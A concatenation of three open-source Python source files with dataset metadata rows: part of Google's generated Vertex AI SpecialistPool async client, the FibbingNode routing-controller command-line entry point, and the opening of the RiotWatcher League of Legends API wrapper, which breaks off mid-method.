request: Union[specialist_pool_service.ListSpecialistPoolsRequest, dict] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListSpecialistPoolsAsyncPager:
r"""Lists SpecialistPools in a Location.
.. code-block:: python
from google.cloud import aiplatform_v1
def sample_list_specialist_pools():
# Create a client
client = aiplatform_v1.SpecialistPoolServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ListSpecialistPoolsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_specialist_pools(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ListSpecialistPoolsRequest, dict]):
The request object. Request message for
[SpecialistPoolService.ListSpecialistPools][google.cloud.aiplatform.v1.SpecialistPoolService.ListSpecialistPools].
parent (:class:`str`):
Required. The name of the SpecialistPool's parent
resource. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.services.specialist_pool_service.pagers.ListSpecialistPoolsAsyncPager:
Response message for
[SpecialistPoolService.ListSpecialistPools][google.cloud.aiplatform.v1.SpecialistPoolService.ListSpecialistPools].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = specialist_pool_service.ListSpecialistPoolsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_specialist_pools,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListSpecialistPoolsAsyncPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
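    # Hedged iteration sketch (illustration only): the pager returned above is an
    # async iterable, so unlike the synchronous sample in the docstring it is
    # consumed with `async for`; `client` and `parent` are placeholder names:
    #
    #   async for pool in await client.list_specialist_pools(parent=parent):
    #       print(pool.display_name)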
async def delete_specialist_pool(
self,
request: Union[
specialist_pool_service.DeleteSpecialistPoolRequest, dict
] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Deletes a SpecialistPool as well as all Specialists
in the pool.
.. code-block:: python
from google.cloud import aiplatform_v1
def sample_delete_specialist_pool():
# Create a client
client = aiplatform_v1.SpecialistPoolServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.DeleteSpecialistPoolRequest(
name="name_value",
)
# Make the request
operation = client.delete_specialist_pool(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.DeleteSpecialistPoolRequest, dict]):
The request object. Request message for
[SpecialistPoolService.DeleteSpecialistPool][google.cloud.aiplatform.v1.SpecialistPoolService.DeleteSpecialistPool].
name (:class:`str`):
Required. The resource name of the SpecialistPool to
delete. Format:
``projects/{project}/locations/{location}/specialistPools/{specialist_pool}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = specialist_pool_service.DeleteSpecialistPoolRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_specialist_pool,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
async def update_specialist_pool(
self,
request: Union[
specialist_pool_service.UpdateSpecialistPoolRequest, dict
] = None,
*,
specialist_pool: gca_specialist_pool.SpecialistPool = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Updates a SpecialistPool.
.. code-block:: python
from google.cloud import aiplatform_v1
def sample_update_specialist_pool():
# Create a client
client = aiplatform_v1.SpecialistPoolServiceClient()
# Initialize request argument(s)
specialist_pool = aiplatform_v1.SpecialistPool()
specialist_pool.name = "name_value"
specialist_pool.display_name = "display_name_value"
request = aiplatform_v1.UpdateSpecialistPoolRequest(
specialist_pool=specialist_pool,
)
# Make the request
operation = client.update_specialist_pool(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.UpdateSpecialistPoolRequest, dict]):
The request object. Request message for
[SpecialistPoolService.UpdateSpecialistPool][google.cloud.aiplatform.v1.SpecialistPoolService.UpdateSpecialistPool].
specialist_pool (:class:`google.cloud.aiplatform_v1.types.SpecialistPool`):
Required. The SpecialistPool which
replaces the resource on the server.
This corresponds to the ``specialist_pool`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
Required. The update mask applies to
the resource.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1.types.SpecialistPool` SpecialistPool represents customers' own workforce to work on their data
labeling jobs. It includes a group of specialist
managers and workers. Managers are responsible for
managing the workers in this pool as well as
customers' data labeling jobs associated with this
pool. Customers create specialist pool as well as
start data labeling jobs on Cloud, managers and
workers handle the jobs using CrowdCompute console.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([specialist_pool, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = specialist_pool_service.UpdateSpecialistPoolRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if specialist_pool is not None:
request.specialist_pool = specialist_pool
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.update_specialist_pool,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("specialist_pool.name", request.specialist_pool.name),)
),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
gca_specialist_pool.SpecialistPool,
metadata_type=specialist_pool_service.UpdateSpecialistPoolOperationMetadata,
)
# Done; return the response.
return response
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.transport.close()
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-aiplatform",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("SpecialistPoolServiceAsyncClient",)
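# --- Hedged usage sketch (illustration only, not part of the generated client) ---
# The methods above are coroutines, so unlike the synchronous samples embedded in
# the docstrings they must be awaited from an event loop. The parent resource name
# below is a placeholder and the helper itself is hypothetical.
async def _sample_create_specialist_pool_async():
    client = SpecialistPoolServiceAsyncClient()
    pool = gca_specialist_pool.SpecialistPool(
        name="name_value", display_name="display_name_value",
    )
    operation = await client.create_specialist_pool(
        parent="projects/my-project/locations/us-central1",
        specialist_pool=pool,
    )
    # On the async surface, AsyncOperation.result() is itself a coroutine.
    return await operation.result()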
|
googleapis/python-aiplatform
|
google/cloud/aiplatform_v1/services/specialist_pool_service/async_client.py
|
Python
|
apache-2.0
| 34,518 | 0.001477 |
from ConfigParser import DEFAULTSECT
from cmd import Cmd
import logging
import sys
import subprocess
import argparse
import datetime
from fibbing import FibbingManager
import fibbingnode
from fibbingnode.misc.utils import dump_threads
import signal
log = fibbingnode.log
CFG = fibbingnode.CFG
class FibbingCLI(Cmd):
Cmd.prompt = '> '
def __init__(self, mngr, *args, **kwargs):
self.fibbing = mngr
Cmd.__init__(self, *args, **kwargs)
def do_add_node(self, line=''):
"""Add a new fibbing node"""
self.fibbing.add_node()
def do_show_lsdb(self, line=''):
log.info(self.fibbing.root.lsdb)
def do_draw_network(self, line):
"""Draw the network as pdf in the given file"""
self.fibbing.root.lsdb.graph.draw(line)
def do_print_graph(self, line=''):
log.info('Current network graph: %s',
self.fibbing.root.lsdb.graph.edges(data=True))
def do_print_net(self, line=''):
"""Print information about the fibbing network"""
self.fibbing.print_net()
def do_print_routes(self, line=''):
"""Print information about the fibbing routes"""
self.fibbing.print_routes()
def do_exit(self, line=''):
"""Exit the prompt"""
return True
def do_cfg(self, line=''):
part = line.split(' ')
val = part.pop()
key = part.pop()
sect = part.pop() if part else DEFAULTSECT
CFG.set(sect, key, val)
def do_call(self, line):
"""Execute a command on a node"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
node.call(*items[1:])
except KeyError:
log.error('Unknown node %s', items[0])
def do_add_route(self, line=''):
"""Setup a fibbing route
add_route network via1 metric1 via2 metric2 ..."""
items = line.split(' ')
if len(items) < 3:
            log.error('add_route takes at least 3 arguments: '
                      'network via_address metric')
else:
points = []
i = 2
while i < len(items):
points.append((items[i-1], items[i]))
i += 2
log.critical('Add route request at %s',
datetime.datetime.now().strftime('%H.%M.%S.%f'))
self.fibbing.install_route(items[0], points, True)
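    # Hedged example of the resulting prompt syntax (prefix and next-hop addresses
    # are placeholders): "add_route 10.0.0.0/24 192.168.1.1 5 192.168.2.1 10"
    # installs a route for the prefix with two (via_address, metric) pairs.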
def do_rm_route(self, line):
"""Remove a route or parts of a route"""
items = line.split(' ')
if len(items) == 1:
ans = raw_input('Remove the WHOLE fibbing route for %s ? (y/N)'
% line)
if ans == 'y':
self.fibbing.remove_route(line)
else:
self.fibbing.remove_route_part(items[0], *items[1:])
def default(self, line):
"""Pass the command to the shell"""
args = line.split(' ')
if args[0] in self.fibbing.nodes:
self.do_call(' '.join(args))
else:
try:
log.info(subprocess.check_output(line, shell=True))
except Exception as e:
log.info('Command %s failed', line)
log.info(e.message)
    def eval(self, line):
        """Interpret the given line as if it had been typed at the prompt"""
        self.onecmd(line)
def do_ospfd(self, line):
"""Connect to the ospfd daemon of the given node"""
try:
self.fibbing[line].call('telnet', 'localhost', '2604')
except KeyError:
log.error('Unknown node %s', line)
def do_vtysh(self, line):
"""Execute a vtysh command on a node"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
result = node.vtysh(*items[1:], configure=False)
log.info(result)
except KeyError:
log.error('Unknown node %s', items[0])
def do_configure(self, line):
"""Execute a vtysh configure command on a node"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
result = node.vtysh(*items[1:], configure=True)
result = result.strip(' \n\t')
if result:
log.info(result)
except KeyError:
log.error('Unknown node %s', items[0])
def do_traceroute(self, line, max_ttl=10):
"""
        Perform a simple traceroute from a source node to a destination IP
        :param max_ttl: the maximum TTL to use
"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
node.call('traceroute', '-q', '1', '-I',
'-m', str(max_ttl), '-w', '.1', items[1])
except KeyError:
log.error('Unknown node %s', items[0])
except ValueError:
log.error('This command takes 2 arguments: '
'source node and destination IP')
def do_dump(self, line=''):
dump_threads()
def handle_args():
parser = argparse.ArgumentParser(description='Starts a fibbing node.')
parser.add_argument('ports', metavar='IF', type=str, nargs='*',
help='A physical interface to use')
parser.add_argument('--debug', action='store_true', default=False,
help='Debug (default: disabled)')
parser.add_argument('--nocli', action='store_true', default=False,
help='Disable the CLI')
parser.add_argument('--cfg', help='Use specified config file',
default=None)
args = parser.parse_args()
instance_count = CFG.getint(DEFAULTSECT, 'controller_instance_number')
# Update default config
if args.cfg:
CFG.read(args.cfg)
fibbingnode.BIN = CFG.get(DEFAULTSECT, 'quagga_path')
# Check if we need to force debug mode
if args.debug:
CFG.set(DEFAULTSECT, 'debug', '1')
if CFG.getboolean(DEFAULTSECT, 'debug'):
log.setLevel(logging.DEBUG)
else:
log.setLevel(logging.INFO)
# Check for any specified physical port to use both in config file
# or in args
ports = set(p for p in CFG.sections()
if not (p == 'fake' or p == 'physical' or p == DEFAULTSECT))
ports.update(args.ports)
if not ports:
log.warning('The fibbing node will not be connected '
'to any physical ports!')
else:
log.info('Using the physical ports: %s', ports)
return ports, instance_count, not args.nocli
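# Hedged sample configuration for the keys read above (values are placeholders);
# any non-default section other than 'fake' or 'physical' is treated as a
# physical port to attach to the fibbing node:
#
#   [DEFAULT]
#   controller_instance_number = 1
#   quagga_path = /usr/lib/quagga
#   debug = 0
#
#   [eth0]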
def main(_CLI=FibbingCLI):
phys_ports, name, cli = handle_args()
if not cli:
fibbingnode.log_to_file('%s.log' % name)
mngr = FibbingManager(name)
def sig_handler(sig, frame):
mngr.cleanup()
fibbingnode.EXIT.set()
sys.exit()
signal.signal(signal.SIGINT, sig_handler)
signal.signal(signal.SIGTERM, sig_handler)
try:
mngr.start(phys_ports=phys_ports)
if cli:
cli = _CLI(mngr=mngr)
cli.cmdloop()
fibbingnode.EXIT.set()
except Exception as e:
log.exception(e)
fibbingnode.EXIT.set()
finally:
fibbingnode.EXIT.wait()
mngr.cleanup()
if __name__ == '__main__':
main()
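# Hedged extension sketch: main() accepts an alternative Cmd subclass through the
# _CLI parameter, so a caller could plug in a custom prompt or extra commands,
# e.g. (hypothetical class, not used above):
#
#   class QuietFibbingCLI(FibbingCLI):
#       prompt = 'fibbing> '
#
#   main(_CLI=QuietFibbingCLI)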
|
lferran/FibbingNode
|
fibbingnode/southbound/main.py
|
Python
|
gpl-2.0
| 7,223 | 0 |
from collections import deque
import time
import requests
# Constants
BRAZIL = 'br'
EUROPE_NORDIC_EAST = 'eune'
EUROPE_WEST = 'euw'
KOREA = 'kr'
LATIN_AMERICA_NORTH = 'lan'
LATIN_AMERICA_SOUTH = 'las'
NORTH_AMERICA = 'na'
OCEANIA = 'oce'
RUSSIA = 'ru'
TURKEY = 'tr'
# Platforms
platforms = {
BRAZIL: 'BR1',
EUROPE_NORDIC_EAST: 'EUN1',
EUROPE_WEST: 'EUW1',
KOREA: 'KR',
LATIN_AMERICA_NORTH: 'LA1',
LATIN_AMERICA_SOUTH: 'LA2',
NORTH_AMERICA: 'NA1',
OCEANIA: 'OC1',
RUSSIA: 'RU',
TURKEY: 'TR1'
}
queue_types = [
'CUSTOM', # Custom games
'NORMAL_5x5_BLIND', # Normal 5v5 blind pick
'BOT_5x5', # Historical Summoners Rift coop vs AI games
'BOT_5x5_INTRO', # Summoners Rift Intro bots
'BOT_5x5_BEGINNER', # Summoner's Rift Coop vs AI Beginner Bot games
'BOT_5x5_INTERMEDIATE', # Historical Summoner's Rift Coop vs AI Intermediate Bot games
'NORMAL_3x3', # Normal 3v3 games
'NORMAL_5x5_DRAFT', # Normal 5v5 Draft Pick games
'ODIN_5x5_BLIND', # Dominion 5v5 Blind Pick games
'ODIN_5x5_DRAFT', # Dominion 5v5 Draft Pick games
'BOT_ODIN_5x5', # Dominion Coop vs AI games
'RANKED_SOLO_5x5', # Ranked Solo 5v5 games
'RANKED_PREMADE_3x3', # Ranked Premade 3v3 games
'RANKED_PREMADE_5x5', # Ranked Premade 5v5 games
'RANKED_TEAM_3x3', # Ranked Team 3v3 games
'RANKED_TEAM_5x5', # Ranked Team 5v5 games
'BOT_TT_3x3', # Twisted Treeline Coop vs AI games
'GROUP_FINDER_5x5', # Team Builder games
'ARAM_5x5', # ARAM games
'ONEFORALL_5x5', # One for All games
'FIRSTBLOOD_1x1', # Snowdown Showdown 1v1 games
'FIRSTBLOOD_2x2', # Snowdown Showdown 2v2 games
'SR_6x6', # Hexakill games
'URF_5x5', # Ultra Rapid Fire games
'BOT_URF_5x5', # Ultra Rapid Fire games played against AI games
'NIGHTMARE_BOT_5x5_RANK1', # Doom Bots Rank 1 games
'NIGHTMARE_BOT_5x5_RANK2', # Doom Bots Rank 2 games
'NIGHTMARE_BOT_5x5_RANK5', # Doom Bots Rank 5 games
'ASCENSION_5x5', # Ascension games
'HEXAKILL', # 6v6 games on twisted treeline
'KING_PORO_5x5', # King Poro game games
'COUNTER_PICK', # Nemesis games,
'BILGEWATER_5x5', # Black Market Brawlers games
]
game_maps = [
{'map_id': 1, 'name': "Summoner's Rift", 'notes': "Summer Variant"},
{'map_id': 2, 'name': "Summoner's Rift", 'notes': "Autumn Variant"},
{'map_id': 3, 'name': "The Proving Grounds", 'notes': "Tutorial Map"},
{'map_id': 4, 'name': "Twisted Treeline", 'notes': "Original Version"},
{'map_id': 8, 'name': "The Crystal Scar", 'notes': "Dominion Map"},
{'map_id': 10, 'name': "Twisted Treeline", 'notes': "Current Version"},
{'map_id': 11, 'name': "Summoner's Rift", 'notes': "Current Version"},
{'map_id': 12, 'name': "Howling Abyss", 'notes': "ARAM Map"},
{'map_id': 14, 'name': "Butcher's Bridge", 'notes': "ARAM Map"},
]
game_modes = [
'CLASSIC', # Classic Summoner's Rift and Twisted Treeline games
'ODIN', # Dominion/Crystal Scar games
'ARAM', # ARAM games
'TUTORIAL', # Tutorial games
'ONEFORALL', # One for All games
'ASCENSION', # Ascension games
'FIRSTBLOOD', # Snowdown Showdown games
'KINGPORO', # King Poro games
]
game_types = [
'CUSTOM_GAME', # Custom games
'TUTORIAL_GAME', # Tutorial games
'MATCHED_GAME', # All other games
]
sub_types = [
'NONE', # Custom games
'NORMAL', # Summoner's Rift unranked games
'NORMAL_3x3', # Twisted Treeline unranked games
'ODIN_UNRANKED', # Dominion/Crystal Scar games
'ARAM_UNRANKED_5v5', # ARAM / Howling Abyss games
'BOT', # Summoner's Rift and Crystal Scar games played against AI
'BOT_3x3', # Twisted Treeline games played against AI
'RANKED_SOLO_5x5', # Summoner's Rift ranked solo queue games
'RANKED_TEAM_3x3', # Twisted Treeline ranked team games
'RANKED_TEAM_5x5', # Summoner's Rift ranked team games
'ONEFORALL_5x5', # One for All games
'FIRSTBLOOD_1x1', # Snowdown Showdown 1x1 games
'FIRSTBLOOD_2x2', # Snowdown Showdown 2x2 games
'SR_6x6', # Hexakill games
'CAP_5x5', # Team Builder games
'URF', # Ultra Rapid Fire games
'URF_BOT', # Ultra Rapid Fire games against AI
'NIGHTMARE_BOT', # Nightmare bots
'ASCENSION', # Ascension games
'HEXAKILL', # Twisted Treeline 6x6 Hexakill
'KING_PORO', # King Poro games
'COUNTER_PICK', # Nemesis games
'BILGEWATER', # Black Market Brawlers games
]
player_stat_summary_types = [
'Unranked', # Summoner's Rift unranked games
'Unranked3x3', # Twisted Treeline unranked games
'OdinUnranked', # Dominion/Crystal Scar games
'AramUnranked5x5', # ARAM / Howling Abyss games
'CoopVsAI', # Summoner's Rift and Crystal Scar games played against AI
'CoopVsAI3x3', # Twisted Treeline games played against AI
'RankedSolo5x5', # Summoner's Rift ranked solo queue games
'RankedTeams3x3', # Twisted Treeline ranked team games
'RankedTeams5x5', # Summoner's Rift ranked team games
'OneForAll5x5', # One for All games
'FirstBlood1x1', # Snowdown Showdown 1x1 games
'FirstBlood2x2', # Snowdown Showdown 2x2 games
'SummonersRift6x6', # Hexakill games
'CAP5x5', # Team Builder games
'URF', # Ultra Rapid Fire games
'URFBots', # Ultra Rapid Fire games played against AI
'NightmareBot', # Summoner's Rift games played against Nightmare AI
'Hexakill', # Twisted Treeline 6x6 Hexakill games
'KingPoro', # King Poro games
'CounterPick', # Nemesis games
'Bilgewater', # Black Market Brawlers games
]
solo_queue, ranked_5s, ranked_3s = 'RANKED_SOLO_5x5', 'RANKED_TEAM_5x5', 'RANKED_TEAM_3x3'
api_versions = {
'champion': 1.2,
'current-game': 1.0,
'featured-games': 1.0,
'game': 1.3,
'league': 2.5,
'lol-static-data': 1.2,
'lol-status': 1.0,
'match': 2.2,
'matchhistory': 2.2,
'matchlist': 2.2,
'stats': 1.3,
'summoner': 1.4,
'team': 2.4
}
class LoLException(Exception):
def __init__(self, error, response):
self.error = error
self.response = response
def __str__(self):
return self.error
error_400 = "Bad request"
error_401 = "Unauthorized"
error_404 = "Game data not found"
error_429 = "Too many requests"
error_500 = "Internal server error"
error_503 = "Service unavailable"
def raise_status(response):
if response.status_code == 400:
raise LoLException(error_400, response)
elif response.status_code == 401:
raise LoLException(error_401, response)
elif response.status_code == 404:
raise LoLException(error_404, response)
elif response.status_code == 429:
raise LoLException(error_429, response)
elif response.status_code == 500:
raise LoLException(error_500, response)
elif response.status_code == 503:
raise LoLException(error_503, response)
else:
response.raise_for_status()
class RateLimit:
def __init__(self, allowed_requests, seconds):
self.allowed_requests = allowed_requests
self.seconds = seconds
self.made_requests = deque()
def __reload(self):
t = time.time()
while len(self.made_requests) > 0 and self.made_requests[0] < t:
self.made_requests.popleft()
def add_request(self):
self.made_requests.append(time.time() + self.seconds)
def request_available(self):
self.__reload()
return len(self.made_requests) < self.allowed_requests
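# Hedged usage sketch (not part of the original module): RateLimit stores one
# expiry timestamp per request, so request_available() stays true while fewer
# than `allowed_requests` expiries are pending. The helper below is hypothetical;
# call it e.g. as _wait_for_request_slot((RateLimit(10, 10), RateLimit(500, 600))).
def _wait_for_request_slot(limits):
    """Block until every RateLimit in `limits` has a free slot, then consume one."""
    while not all(lim.request_available() for lim in limits):
        time.sleep(0.1)
    for lim in limits:
        lim.add_request()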
class RiotWatcher:
def __init__(self, key, default_region=NORTH_AMERICA, limits=(RateLimit(10, 10), RateLimit(500, 600), )):
self.key = key
self.default_region = default_region
self.limits = limits
def can_make_request(self):
for lim in self.limits:
if not lim.request_available():
return False
return True
def base_request(self, url, region, static=False, **kwargs):
if region is None:
region = self.default_region
args = {'api_key': self.key}
for k in kwargs:
if kwargs[k] is not None:
args[k] = kwargs[k]
r = requests.get(
'https://{proxy}.api.pvp.net/api/lol/{static}{region}/{url}'.format(
proxy='global' if static else region,
static='static-data/' if static else '',
region=region,
url=url
),
params=args
)
if not static:
for lim in self.limits:
lim.add_request()
raise_status(r)
return r.json()
def _observer_mode_request(self, url, proxy=None, **kwargs):
if proxy is None:
proxy = self.default_region
args = {'api_key': self.key}
for k in kwargs:
if kwargs[k] is not None:
args[k] = kwargs[k]
r = requests.get(
'https://{proxy}.api.pvp.net/observer-mode/rest/{url}'.format(
proxy=proxy,
url=url
),
params=args
)
for lim in self.limits:
lim.add_request()
raise_status(r)
return r.json()
@staticmethod
def sanitized_name(name):
return name.replace(' ', '').lower()
# champion-v1.2
def _champion_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/champion/{end_url}'.format(
version=api_versions['champion'],
end_url=end_url
),
region,
**kwargs
)
def get_all_champions(self, region=None, free_to_play=False):
return self._champion_request('', region, freeToPlay=free_to_play)
def get_champion(self, champion_id, region=None):
return self._champion_request('{id}'.format(id=champion_id), region)
# current-game-v1.0
def get_current_game(self, summoner_id, platform_id=None, region=None):
if platform_id is None:
platform_id = platforms[self.default_region]
return self._observer_mode_request(
'consumer/getSpectatorGameInfo/{platform}/{summoner_id}'.format(
platform=platform_id,
summoner_id=summoner_id
),
region
)
# featured-game-v1.0
def get_featured_games(self, proxy=None):
return self._observer_mode_request('featured', proxy)
# game-v1.3
def _game_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/game/{end_url}'.format(
version=api_versions['game'],
end_url=end_url
),
region,
**kwargs
)
def get_recent_games(self, summoner_id, region=None):
return self._game_request('by-summoner/{summoner_id}/recent'.format(summoner_id=summoner_id), region)
# league-v2.5
def _league_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/league/{end_url}'.format(
version=api_versions['league'],
end_url=end_url
),
region,
**kwargs
)
def get_league(self, summoner_ids=None, team_ids=None, region=None):
"""summoner_ids and team_ids arguments must be iterable, only one should be specified, not both"""
if (summoner_ids is None) != (team_ids is None):
if summoner_ids is not None:
return self._league_request(
'by-summoner/{summoner_ids}'.format(summoner_ids=','.join([str(s) for s in summoner_ids])),
region
)
else:
return self._league_request(
'by-team/{team_ids}'.format(team_ids=','.join([str(t) for t in team_ids])),
region
)
def get_league_entry(self, summoner_ids=None, team_ids=None, region=None):
"""summoner_ids and team_ids arguments must be iterable, only one should be specified, not both"""
if (summoner_ids is None) != (team_ids is None):
if summoner_ids is not None:
return self._league_request(
'by-summoner/{summoner_ids}/entry'.format(
summoner_ids=','.join([str(s) for s in summoner_ids])
),
region
)
else:
return self._league_request(
'by-team/{team_ids}/entry'.format(team_ids=','.join([str(t) for t in team_ids])),
region
)
def get_challenger(self, region=None, queue=solo_queue):
return self._league_request('challenger', region, type=queue)
def get_master(self, region=None, queue=solo_queue):
return self._league_request('master', region, type=queue)
# lol-static-data-v1.2
def _static_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/{end_url}'.format(
version=api_versions['lol-static-data'],
end_url=end_url
),
region,
static=True,
**kwargs
)
def static_get_champion_list(self, region=None, locale=None, version=None, data_by_id=None, champ_data=None):
return self._static_request(
'champion',
region,
locale=locale,
version=version,
dataById=data_by_id,
champData=champ_data
)
def static_get_champion(self, champ_id, region=None, locale=None, version=None, champ_data=None):
return self._static_request(
'champion/{id}'.format(id=champ_id),
region,
locale=locale,
version=version,
champData=champ_data
)
def static_get_item_list(self, region=None, locale=None, version=None, item_list_data=None):
return self._static_request('item', region, locale=locale, version=version, itemListData=item_list_data)
def static_get_item(self, item_id, region=None, locale=None, version=None, item_data=None):
return self._static_request(
'item/{id}'.format(id=item_id),
region,
locale=locale,
version=version,
itemData=item_data
)
def static_get_mastery_list(self, region=None, locale=None, version=None, mastery_list_data=None):
return self._static_request(
'mastery',
region,
locale=locale,
version=version,
masteryListData=mastery_list_data
)
def static_get_mastery(self, mastery_id, region=None, locale=None, version=None, mastery_data=None):
return self._static_request(
'mastery/{id}'.format(id=mastery_id),
region,
locale=locale,
version=version,
masteryData=mastery_data
)
def static_get_realm(self, region=None):
return self._static_request('realm', region)
def static_get_rune_list(self, region=None, locale=None, version=None, rune_list_data=None):
return self._static_request('rune', region, locale=locale, version=version, runeListData=rune_list_data)
def static_get_rune(self, rune_id, region=None, locale=None, version=None, rune_data=None):
return self._static_request(
'rune/{id}'.format(id=rune_id),
region,
locale=locale,
version=version,
runeData=rune_data
)
def static_get_summoner_spell_list(self, region=None, locale=None, version=None, data_by_id=None, spell_data=None):
return self._static_request(
'summoner-spell',
region,
locale=locale,
version=version,
dataById=data_by_id,
spellData=spell_data
)
def static_get_summoner_spell(self, spell_id, region=None, locale=None, version=None, spell_data=None):
return self._static_request(
'summoner-spell/{id}'.format(id=spell_id),
region,
locale=locale,
version=version,
spellData=spell_data
)
def static_get_versions(self, region=None):
return self._static_request('versions', region)
# match-v2.2
def _match_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/match/{end_url}'.format(
version=api_versions['match'],
end_url=end_url
),
region,
**kwargs
)
def get_match(self, match_id, region=None, include_timeline=False):
return self._match_request(
'{match_id}'.format(match_id=match_id),
region,
includeTimeline=include_timeline
)
# lol-status-v1.0
@staticmethod
def get_server_status(region=None):
if region is None:
url = 'shards'
else:
url = 'shards/{region}'.format(region=region)
r = requests.get('http://status.leagueoflegends.com/{url}'.format(url=url))
raise_status(r)
return r.json()
# match history-v2.2
def _match_history_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/matchhistory/{end_url}'.format(
version=api_versions['matchhistory'],
end_url=end_url
),
region,
**kwargs
)
def get_match_history(self, summoner_id, region=None, champion_ids=None, ranked_queues=None, begin_index=None,
end_index=None):
return self._match_history_request(
'{summoner_id}'.format(summoner_id=summoner_id),
region,
championIds=champion_ids,
rankedQueues=ranked_queues,
beginIndex=begin_index,
